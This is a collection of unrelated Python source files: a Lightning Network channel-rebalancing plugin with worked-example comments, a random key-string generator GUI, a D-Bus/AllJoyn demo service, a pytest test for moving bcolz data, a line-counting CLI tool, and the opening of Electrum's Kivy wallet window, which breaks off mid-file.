erring_channel = e.error.get('data', {}).get('erring_channel')
if erring_channel == incoming_scid:
raise RpcError("rebalance", payload, {'message': 'Error with incoming channel'})
if erring_channel == outgoing_scid:
raise RpcError("rebalance", payload, {'message': 'Error with outgoing channel'})
erring_direction = e.error.get('data', {}).get('erring_direction')
if erring_channel is not None and erring_direction is not None:
excludes.append(erring_channel + '/' + str(erring_direction))
except Exception as e:
plugin.log("Exception: " + str(e), 'debug')
return cleanup(plugin, label, payload, success_msg, e)
return cleanup(plugin, label, payload, success_msg)
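# Example invocation (hypothetical short channel ids and amounts; like any other
# plugin method it is called through lightning-cli):
# lightning-cli rebalance 103x1x0 105x2x1 1000000sat 0.5 120
# moves 1000000sat out of channel 103x1x0 and into channel 105x2x1, allowing at
# most 0.5% fee and retrying for up to 120 seconds.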
def a_minus_b(a: Millisatoshi, b: Millisatoshi):
# a minus b, but Millisatoshi cannot be negative
return a - b if a > b else Millisatoshi(0)
def must_send(liquidity):
# liquidity is too high, must send some sats
return a_minus_b(liquidity["min"], liquidity["their"])
def should_send(liquidity):
# liquidity is a bit high, would be good to send some sats
return a_minus_b(liquidity["ideal"]["their"], liquidity["their"])
def could_send(liquidity):
# liquidity may be a bit low, but we can still send some more sats if needed
return a_minus_b(liquidity["our"], liquidity["min"])
def must_receive(liquidity):
# liquidity is too low, must receive some sats
return a_minus_b(liquidity["min"], liquidity["our"])
def should_receive(liquidity):
# liquidity is a bit low, would be good to receive some sats
return a_minus_b(liquidity["ideal"]["our"], liquidity["our"])
def could_receive(liquidity):
# liquidity may be a bit high, but we can still receive some more sats if needed
return a_minus_b(liquidity["their"], liquidity["min"])
def get_open_channels(plugin: Plugin):
channels = []
for peer in plugin.rpc.listpeers()["peers"]:
for ch in peer["channels"]:
if ch["state"] == "CHANNELD_NORMAL" and not ch["private"]:
channels.append(ch)
return channels
def check_liquidity_threshold(channels: list, threshold: Millisatoshi):
# check if overall rebalances can be successful with this threshold
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
required = Millisatoshi(0)
for ch in channels:
required += min(threshold, ch["total_msat"] / 2)
return required < our and required < total - our
def binary_search(channels: list, low: Millisatoshi, high: Millisatoshi):
if high - low < Millisatoshi("1sat"):
return low
next_step = (low + high) / 2
if check_liquidity_threshold(channels, next_step):
return binary_search(channels, next_step, high)
else:
return binary_search(channels, low, next_step)
def get_enough_liquidity_threshold(channels: list):
biggest_channel = max(channels, key=lambda ch: ch["total_msat"])
max_threshold = binary_search(channels, Millisatoshi(0), biggest_channel["total_msat"] / 2)
return max_threshold / 2
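# Worked example for the threshold search (hypothetical channels with msat totals
# 2_000_000 / 4_000_000 / 10_000_000 and 6_000_000 msat on our side overall):
# required(T) = min(T, 1M) + min(T, 2M) + min(T, 5M), and the binary search looks for
# the largest T (up to half of the biggest channel, 5M) with required(T) < 6M, which
# converges on roughly 3M; get_enough_liquidity_threshold() then returns half of that,
# i.e. about 1.5M msat of "enough" liquidity per channel side.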
def get_ideal_ratio(channels: list, enough_liquidity: Millisatoshi):
# ideal liquidity ratio for big channels:
# small channels should have a 50/50 liquidity ratio to be usable
# and big channels can store the remaining liquidity above the threshold
assert len(channels) > 0
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
chs = list(channels) # get a copy!
while len(chs) > 0:
ratio = int(our) / int(total)
smallest_channel = min(chs, key=lambda ch: ch["total_msat"])
if smallest_channel["total_msat"] * min(ratio, 1 - ratio) > enough_liquidity:
break
min_liquidity = min(smallest_channel["total_msat"] / 2, enough_liquidity)
diff = smallest_channel["total_msat"] * ratio
diff = max(diff, min_liquidity)
diff = min(diff, smallest_channel["total_msat"] - min_liquidity)
our -= diff
total -= smallest_channel["total_msat"]
chs.remove(smallest_channel)
assert 0 <= ratio and ratio <= 1
return ratio
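# Continuing the hypothetical example above (enough_liquidity ~1.5M msat): the overall
# ratio starts at 6M/16M = 0.375. The 2M and 4M channels cannot hold 1.5M on their
# smaller side at that ratio, so they are pinned near 50/50 and removed, leaving 3.5M
# of our liquidity against the 10M channel; the ideal ratio returned for the remaining
# big channel is therefore 3.5/10 = 0.35.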
def feeadjust_would_be_nice(plugin: Plugin):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjust"]
if len(commands) == 1:
msg = plugin.rpc.feeadjust()
plugin.log(f"Feeadjust succeeded: {msg}")
else:
plugin.log("The feeadjuster plugin would be useful here")
def get_max_amount(i: int, plugin: Plugin):
return max(plugin.min_amount, plugin.enough_liquidity / (4**(i + 1)))
def get_max_fee(plugin: Plugin, msat: Millisatoshi):
# TODO: sanity check
return (plugin.fee_base + msat * plugin.fee_ppm / 10**6) * plugin.feeratio
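# Example with assumed settings: if enough_liquidity is 1_000_000_000 msat and
# min_amount is 50000sat, get_max_amount() yields 250_000_000 msat on the first
# attempt (i=0), 62_500_000 msat on the second, and then falls back to min_amount.
# With fee_base=1000 msat, fee_ppm=10 and feeratio=0.5, get_max_fee() for a
# 250_000_000 msat rebalance allows (1000 + 2500) * 0.5 = 1750 msat.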
def get_chan(plugin: Plugin, scid: str):
for peer in plugin.rpc.listpeers()["peers"]:
if len(peer["channels"]) == 0:
continue
# We might have multiple channel entries ! Eg if one was just closed
# and reopened.
for chan in peer["channels"]:
if chan.get("short_channel_id") == scid:
return chan
def liquidity_info(channel, enough_liquidity: Millisatoshi, ideal_ratio: float):
liquidity = {
"our": channel["to_us_msat"],
"their": channel["total_msat"] - channel["to_us_msat"],
"min": min(enough_liquidity, channel["total_msat"] / 2),
"max": max(a_minus_b(channel["total_msat"], enough_liquidity), channel["total_msat"] / 2),
"ideal": {}
}
liquidity["ideal"]["our"] = min(max(channel["total_msat"] * ideal_ratio, liquidity["min"]), liquidity["max"])
liquidity["ideal"]["their"] = min(max(channel["total_msat"] * (1 - ideal_ratio), liquidity["min"]), liquidity["max"])
return liquidity
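# Worked example of liquidity_info() and the helpers above (hypothetical values): a
# 1_000_000_000 msat channel with 800_000_000 msat on our side, enough_liquidity of
# 200_000_000 msat and ideal_ratio 0.35 gives min=200M, max=800M, ideal.our=350M and
# ideal.their=650M. Then must_send()=0 (their side still holds the minimum),
# should_send()=450M (to reach the ideal split) and could_send()=600M, while all of
# the *receive helpers return 0.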
def wait_for(success, timeout: int = 60):
# polling helper: retries success() with a capped exponential backoff until it returns True or the timeout expires
# taken and modified from pyln-testing/pyln/testing/utils.py
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
return False
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
return True
def wait_for_htlcs(plugin, failed_channels: list, scids: list = None):
# HTLC settlement helper
# taken and modified from pyln-testing/pyln/testing/utils.py
result = True
peers = plugin.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel.get('short_channel_id') not in scids:
continue
if channel.get('short_channel_id') in failed_channels:
result = False
continue
if 'htlcs' in channel:
if not wait_for(lambda: len(plugin.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0):
failed_channels.append(channel.get('short_channel_id'))
plugin.log(f"Timeout while waiting for htlc settlement in channel {channel.get('short_channel_id')}")
result = False
return result
def maybe_rebalance_pairs(plugin: Plugin, ch1, ch2, failed_channels: list):
scid1 = ch1["short_channel_id"]
scid2 = ch2["short_channel_id"]
result = {"success": False, "fee_spent": Millisatoshi(0)}
if scid1 + ":" + scid2 in failed_channels:
return result
# check if HTLCs are settled
if not wait_for_htlcs(plugin, failed_channels, [scid1, scid2]):
return result
i = 0
while not plugin.rebalance_stop:
liquidity1 = liquidity_info(ch1, plugin.enough_liquidity, plugin.ideal_ratio)
liquidity2 = liquidity_info(ch2, plugin.enough_liquidity, plugin.ideal_ratio)
amount1 = min(must_send(liquidity1), could_receive(liquidity2))
amount2 = min(should_send(liquidity1), should_receive(liquidity2))
amount3 = min(could_send(liquidity1), must_receive(liquidity2))
amount = max(amount1, amount2, amount3)
if amount < plugin.min_amount:
return result
amount = min(amount, get_max_amount(i, plugin))
maxfee = get_max_fee(plugin, amount)
plugin.log(f"Try to rebalance: {scid1} -> {scid2}; amount={amount}; maxfee={maxfee}")
start_ts = time.time()
try:
res = rebalance(plugin, outgoing_scid=scid1, incoming_scid=scid2, msatoshi=amount, maxfeepercent=0, retry_for=1200, exemptfee=maxfee)
except Exception:
failed_channels.append(scid1 + ":" + scid2)
# rebalance failed, let's try with a smaller amount
while (get_max_amount(i, plugin) >= amount and
get_max_amount(i, plugin) != get_max_amount(i + 1, plugin)):
i += 1
if amount > get_max_amount(i, plugin):
continue
return result
result["success"] = True
result["fee_spent"] += res["fee"]
htlc_start_ts = time.time()
# wait for settlement
htlc_success = wait_for_htlcs(plugin, failed_channels, [scid1, scid2])
current_ts = time.time()
res["elapsed_time"] = str(timedelta(seconds=current_ts - start_ts))[:-3]
res["htlc_time"] = str(timedelta(seconds=current_ts - htlc_start_ts))[:-3]
plugin.log(f"Rebalance succeeded: {res}")
if not htlc_success:
return result
ch1 = get_chan(plugin, scid1)
assert ch1 is not None
ch2 = get_chan(plugin, scid2)
assert ch2 is not None
return result
def maybe_rebalance_once(plugin: Plugin, failed_channels: list):
channels = get_open_channels(plugin)
for ch1 in channels:
for ch2 in channels:
if ch1 == ch2:
continue
result = maybe_rebalance_pairs(plugin, ch1, ch2, failed_channels)
if result["success"] or plugin.rebalance_stop:
return result
return {"success": False, "fee_spent": Millisatoshi(0)}
def feeadjuster_toggle(plugin: Plugin, new_value: bool):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjuster-toggle"]
if len(commands) == 1:
msg = plugin.rpc.feeadjuster_toggle(new_value)
return msg["forward_event_subscription"]["previous"]
else:
return True
def rebalanceall_thread(plugin: Plugin):
if not plugin.mutex.acquire(blocking=False):
return
try:
start_ts = time.time()
feeadjuster_state = feeadjuster_toggle(plugin, False)
channels = get_open_channels(plugin)
plugin.enough_liquidity = get_enough_liquidity_threshold(channels)
plugin.ideal_ratio = get_ideal_ratio(channels, plugin.enough_liquidity)
plugin.log(f"Automatic rebalance is running with enough liquidity threshold: {plugin.enough_liquidity}, "
f"ideal liquidity ratio: {plugin.ideal_ratio * 100:.2f}%, "
f"min rebalancable amount: {plugin.min_amount}, "
f"feeratio: {plugin.feeratio}")
failed_channels = []
success = 0
fee_spent = Millisatoshi(0)
while not plugin.rebalance_stop:
result = maybe_rebalance_once(plugin, failed_channels)
if not result["success"]:
break
success += 1
fee_spent += result["fee_spent"]
feeadjust_would_be_nice(plugin)
feeadjuster_toggle(plugin, feeadjuster_state)
elapsed_time = timedelta(seconds=time.time() - start_ts)
plugin.log(f"Automatic rebalance finished: {success} successful rebalance, {fee_spent} fee spent, it took {str(elapsed_time)[:-3]}")
finally:
plugin.mutex.release()
@plugin.method("rebalanceall")
def rebalanceall(plugin: Plugin, min_amount: Millisatoshi = Millisatoshi("50000sat"), feeratio: float = 0.5):
"""Rebalance all unbalanced channels if possible for a very low fee.
Default minimum rebalancable amount is 50000sat. Default feeratio = 0.5, half of our node's default fee.
To be economical, it tries to fix the liquidity cheaper than it can be ruined by transaction forwards.
It may run for a long time (hours) in the background, but can be stopped with the rebalancestop method.
"""
# some early checks before we start the async thread
if plugin.mutex.locked():
return {"message": "Rebalance is already running, this may take a while. To stop it use the cli method 'rebalancestop'."}
channels = get_open_channels(plugin)
if len(channels) <= 1:
return {"message": "Error: Not enough open channels to rebalance anything"}
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
min_amount = Millisatoshi(min_amount)
if total - our < min_amount or our < min_amount:
return {"message": "Error: Not enough liquidity to rebalance anything"}
# param parsing ensure correct type
plugin.feeratio = float(feeratio)
plugin.min_amount = min_amount
# run the job
t = Thread(target=rebalanceall_thread, args=(plugin, ))
t.start()
return {"message": f"Rebalance started with min rebalancable amount: {plugin.min_amount}, feeratio: {plugin.feeratio}"}
@plugin.method("rebalancestop")
def rebalancestop(plugin: Plugin):
"""It stops the ongoing rebalanceall.
"""
if not plugin.mutex.locked():
return {"message": "No rebalance is running, nothing to stop"}
plugin.rebalance_stop = True
plugin.mutex.acquire(blocking=True)
plugin.rebalance_stop = False
plugin.mutex.release()
return {"message": "Rebalance stopped"}
@plugin.init()
def init(options, configuration, plugin):
config = plugin.rpc.listconfigs()
plugin.cltv_final = config.get("cltv-final")
plugin.fee_base = Millisatoshi(config.get("fee-base"))
plugin.fee_ppm = config.get("fee-per-satoshi")
plugin.mutex = Lock()
plugin.log(f"Plugin rebalance initialized with {plugin.fee_base} base / {plugin.fee_ppm} ppm fee, "
f"cltv_final: {plugin.cltv_final}")
plugin.run()
|
SimpleKeyGen.py
|
import rstr
import re
import PySimpleGUI as sg
from threading import Thread
def pattern_gen(pattern):
spl_characters = re.compile(r'[@_!#$%^&*()<>?/\|}{~:]')
if spl_characters.search(pattern) is not None:
        r = rstr.xeger(pattern.replace("X", "[A-Z]").replace("x", "[a-z]").replace("D", r"\d"))
        r = re.sub(spl_characters, rstr.xeger(r"[@_!#$%^&*()<>?/\|}{~:]"), r)
window['results'].print(r)
else:
        r = rstr.xeger(pattern.replace("X", "[A-Z]").replace("x", "[a-z]").replace("D", r"\d"))
window['results'].print(r)
Layout = [
[sg.Text("Python Key Generator", font=("", 40))],
[sg.Text("Developed By Henry Richard J", font=("", 15), size=(30, 1))],
[sg.Input(key="-sampleString-", font=("", 20))],
[sg.Text("Number of keys to generate", size=(30, 1), font=("", 20))],
[sg.Slider(range=(1, 100), default_value=5, size=(45, 20), font=("", 10), key="-No_Keys-",
tooltip="Use The Slider To Choose Number Of Keys To Be Generated", orientation="horizontal")],
[sg.Multiline(size=(100, 22), disabled=True, key="results", font=("", 10))],
[sg.Button("Generate", key="-Generate-", font=("", 15))]
]
window = sg.Window('Python Key Generator', Layout, element_justification='center')
while True:
event, values = window.read()
if event == sg.WIN_CLOSED:
break
if event == "-Generate-":
replaced = re.sub(r"[A-Z]", "X", values['-sampleString-'])
replaced = re.sub(r"[a-z]", "x", replaced)
replaced = re.sub(r"[0-9]", "D", replaced)
for i in range(int(values["-No_Keys-"])):
Thread(target=pattern_gen, args=(replaced,)).start()
|
hello.py
|
#!/usr/bin/python3
import time, uuid
import threading
import traceback
import sys
import os
import socket
import collections
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from gi.repository import GObject
scriptDir = os.path.dirname(os.path.realpath(__file__))
sys.path.append( scriptDir + "/common" )
import core
DBusGMainLoop(set_as_default=True)
DBUS_BRIDGE_NAME = 'com.devicehive.alljoyn.bridge'
DBUS_BRIDGE_PATH = '/com/devicehive/alljoyn/bridge'
DBUS_BUS_NAME = 'com.devicehive.alljoyn.SmartHome'
DBUS_BUS_PATH = '/com/devicehive/alljoyn/SmartHome'
HELLO_SVC = 'org.allseen.SmartHome.Hello'
bus = dbus.SystemBus()
bus_name = dbus.service.BusName(DBUS_BUS_NAME, bus)
class HelloService(core.PropertiesServiceInterface):
def __init__(self, container):
core.PropertiesServiceInterface.__init__(self, container, "/Service",
{HELLO_SVC : {'Name': 'AllJoyn'}})
def IntrospectionXml(self):
return """
<interface name="org.allseen.SmartHome.Hello">
<property name="Name" type="s" access="readwrite"/>
<method name="Greet">
<arg name="greeting" type="s" direction="out"/>
</method>
</interface>
""" + core.PropertiesServiceInterface.IntrospectionXml(self)
@dbus.service.method(HELLO_SVC, in_signature='', out_signature='s')
def Greet(self):
print("Hello, %s!" % self.Get(HELLO_SVC, "Name"))
return "Hello, %s!" % self.Get(HELLO_SVC, "Name")
class Hello():
def __init__(self, busname, name):
self._id = uuid.uuid4().hex
self._name = name
about_props = {
'AppId': dbus.ByteArray(bytes.fromhex(self.id)),
'DefaultLanguage': 'en',
'DeviceName': self.name,
'DeviceId': self.id,
'AppName': 'Hello',
'Manufacturer': 'DeviceHive',
'DateOfManufacture': '2015-10-28',
'ModelNumber': 'example',
'SupportedLanguages': ['en'],
'Description': 'DeviceHive Alljoyn Hello Device',
'SoftwareVersion': '1.0',
'HardwareVersion': '1.0',
'SupportUrl': 'devicehive.com'
}
self._container = core.BusContainer(busname, DBUS_BUS_PATH + '/' + self.id)
self._services = [
core.AboutService(self._container, about_props)
,HelloService(self._container)
# ,core.ConfigService(self._container, self.name)
]
print("Registered %s on dbus" % self.name)
@property
def id(self):
return self._id
@property
def name(self):
return self._name
def publish(self, bridge):
service = self._services[0]
bridge.AddService(self._container.bus.get_name(), self._container.relative('').rstrip('/'), HELLO_SVC,
# ignore_reply=True
reply_handler=lambda id: print("ID: %s" % id),
error_handler=lambda err: print("Error: %s" % err)
)
print("Published %s on bridge" % self.name)
def worker():
try:
bridge = dbus.Interface(bus.get_object(DBUS_BRIDGE_NAME, DBUS_BRIDGE_PATH),
dbus_interface='com.devicehive.alljoyn.bridge')
plug = Hello(bus_name, 'Hello')
plug.publish(bridge)
except Exception as err:
print(err)
traceback.print_exc()
os._exit(1)
def main():
# init d-bus
GObject.threads_init()
dbus.mainloop.glib.threads_init()
# start mainloop
loop = GObject.MainLoop()
worker_thread = threading.Thread(target=worker,)
worker_thread.start()
try:
loop.run()
except (KeyboardInterrupt, SystemExit):
# for lamp in lamps:
# lamp.deinit()
loop.quit()
worker_thread.join()
if __name__ == "__main__":
main()
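# Hypothetical smoke test once the service is registered on the system bus.
# The object path below assumes the container exposes HelloService at
# "<bus path>/<device id>/Service"; substitute the generated device id:
#
#   dbus-send --system --print-reply \
#       --dest=com.devicehive.alljoyn.SmartHome \
#       /com/devicehive/alljoyn/SmartHome/<device-id>/Service \
#       org.allseen.SmartHome.Hello.Greet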
|
test_movebcolz.py
|
import logging
import os
import numpy as np
import pandas as pd
import pytest
import redis
import shutil
import socket
import threading
import time
from bquery import ctable
from time import sleep
from uuid import uuid4
import bqueryd
TEST_REDIS = 'redis://redis:6379/0'
@pytest.fixture
def redis_server():
"""
Return a Redis Client connected to local (test) redis.
Remove all keys from REDIS before and after use.
"""
redis_server = redis.from_url(TEST_REDIS)
redis_server.flushdb()
yield redis_server
redis_server.flushdb()
@pytest.fixture
def clear_dirs():
if os.path.isdir(bqueryd.INCOMING):
shutil.rmtree(bqueryd.INCOMING)
if os.path.isdir(bqueryd.DEFAULT_DATA_DIR):
shutil.rmtree(bqueryd.DEFAULT_DATA_DIR)
@pytest.fixture
def mover():
mover = bqueryd.MoveBcolzNode(redis_url=TEST_REDIS, loglevel=logging.DEBUG)
mover_thread = threading.Thread(target=mover.go)
mover_thread.daemon = True
mover_thread.start()
# Sleep 5 seconds, just to make sure all connections are properly established
sleep(5)
yield mover
# shutdown the thread
mover.running = False
@pytest.mark.usefixtures('clear_dirs')
@pytest.mark.usefixtures('mover')
def test_movebcolz(redis_server, tmpdir):
# Make a bcolz from a pandas DataFrame
data_df = pd.DataFrame(
data=np.random.rand(100, 10),
columns=['col_{}'.format(i+1) for i in range(10)])
local_bcolz = str(tmpdir.join('test_mover.bcolz'))
ctable.fromdataframe(data_df, rootdir=local_bcolz)
assert os.path.isdir(local_bcolz)
    # copy the bcolz directory to bqueryd.INCOMING
ticket = str(uuid4())
ticket_dir = os.path.join(bqueryd.INCOMING, ticket, 'test_mover.bcolz')
shutil.copytree(local_bcolz, ticket_dir)
    # Construct the redis entry as it would look before the download completes
progress_slot = '%s_%s' % (time.time() - 60, -1)
node_filename_slot = '%s_%s' % (socket.gethostname(), 's3://bcolz/test_mover.bcolz')
redis_server.hset(bqueryd.REDIS_TICKET_KEY_PREFIX + ticket, node_filename_slot, progress_slot)
# wait for some time
sleep(5)
# At this stage, we don't expect the bcolz directory to be moved to bqueryd.DEFAULT_DATA_DIR, because the progress
# slot has not been updated yet
files_in_default_data_dir = os.listdir(bqueryd.DEFAULT_DATA_DIR)
files_in_default_data_dir.sort()
assert files_in_default_data_dir == ['incoming']
# ticket_dir still exists
assert os.path.isdir(ticket_dir)
# Now update progress slot
new_progress_slot = '%s_%s' % (time.time(), 'DONE')
redis_server.hset(bqueryd.REDIS_TICKET_KEY_PREFIX + ticket, node_filename_slot, new_progress_slot)
# Sleep again
sleep(5)
files_in_default_data_dir = os.listdir(bqueryd.DEFAULT_DATA_DIR)
files_in_default_data_dir.sort()
assert files_in_default_data_dir == ['incoming', 'test_mover.bcolz']
# ticket_dir should have been deleted.
assert not os.path.exists(ticket_dir)
if __name__ == '__main__':
pytest.main([__file__, '-v', '-s'])
|
clines.py
|
import pathlib
import os
import threading
from lib.progressbar import progressbar
import colorama
import time
import sys
total_amount_of_lines = 0
total_amount_of_nonempty_lines = 0
def summary_and_quit():
print(f"\n\n Summary: {total_amount_of_lines} line(s)\n {total_amount_of_nonempty_lines} nonempty line(s)\n\n")
progressbar.stop()
sys.exit()
def clines():
global total_amount_of_lines, total_amount_of_nonempty_lines
try:
colorama.init()
threading.Thread(target=progressbar.show).start()
time.sleep(0.5)
path = os.getcwd()
all_items = [item for item in os.listdir(path)]
folders = [f"{folder}/" for folder in all_items if pathlib.Path(folder).is_dir()]
files = [file for file in all_items if pathlib.Path(file).is_file()]
total_amount_of_files = len(all_items)
files_read = 0
filename_max_length = 30
name_gap = (2 + max([len(item) for item in all_items]))
if name_gap > filename_max_length:
name_gap = filename_max_length
directory = f"\n\n Directory: {path}\n\n"
title = f"Name{' ' * name_gap}Items/Lines NonemptyLines"
title_underline = f"----{' ' * name_gap}----------- -------------"
interrupted_text = " PROCESS INTERRUPTED "
# Get the position where to print the amount of lines
lines_text_location = title.find("Items/Lines") + len("Items/Lines")
print(directory)
print(title)
print(title_underline)
# Read folders --------------------------------------------------
for current_folder in folders:
foldername_to_print = current_folder
if len(foldername_to_print) > filename_max_length:
foldername_to_print = current_folder[:filename_max_length - 4] + ".../"
try:
progressbar.current_process = foldername_to_print
amount_of_subitems = len([subitem for subitem in os.listdir(f"{path}/{current_folder}")])
print(f"\033[33m📁\033[0m {foldername_to_print}{' ' * (lines_text_location - 3 - len(foldername_to_print) - len('Items/Lines'))}{amount_of_subitems}")
except PermissionError:
print(f"\033[33m📁\033[0m {foldername_to_print}{' ' * (lines_text_location - 3 - len(foldername_to_print) - len('Items/Lines'))}- \033[31mACCESS DENIED\033[0m")
except KeyboardInterrupt:
summary_and_quit()
finally:
files_read += 1
progressbar.loading_text = f"{files_read}/{total_amount_of_files}"
progressbar.overall_progress = (files_read / total_amount_of_files) * 100
# Read files ----------------------------------------------------
for current_file in files:
filename_to_print = current_file
if len(filename_to_print) > filename_max_length:
filename_to_print = filename_to_print[:filename_max_length - 3 - len(filename_to_print[(filename_to_print.rfind(".")):])] + "..." + filename_to_print[(filename_to_print.rfind(".")):]
try:
with open(current_file, "r", encoding="iso-8859-15") as file:
progressbar.current_progress = 0
# Update the progressbar "current file" text
progressbar.current_process = filename_to_print
lines = file.readlines()
total_lines = len(lines)
nonempty_lines = 0
current_line = 0
for line in lines:
if len(str(line).replace(" ", "").strip("\n")) > 0:
nonempty_lines += 1
current_line += 1
progressbar.current_progress = (current_line / total_lines) * 100
print(f"\033[36m📄\033[0m {filename_to_print}{' ' * (lines_text_location-(3+len(filename_to_print)+len(str(total_lines))))}{total_lines} {nonempty_lines}")
total_amount_of_lines += total_lines
total_amount_of_nonempty_lines += nonempty_lines
file.close()
except PermissionError:
print(f"\033[36m📄\033[0m {filename_to_print}{' ' * (lines_text_location - (4 + len(filename_to_print)))}- - \033[31mACCESS DENIED\033[0m")
except KeyboardInterrupt:
print(f"\n\033[31m{'-' * int((len(title)/2)-(len(interrupted_text)/2))}{interrupted_text}{'-' * int((len(title)/2)-(len(interrupted_text)/2))}\033[0m")
summary_and_quit()
finally:
files_read += 1
progressbar.loading_text = f"{files_read}/{total_amount_of_files}"
progressbar.overall_progress = (files_read / total_amount_of_files) * 100
time.sleep(0.5)
summary_and_quit()
except KeyboardInterrupt:
progressbar.stop()
if __name__ == '__main__':
clines()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register widget cache to keep memory usage down; a timeout of 0 caches
# the data forever.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', 5)
return decimal_point_to_base_unit_name(decimal_point)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
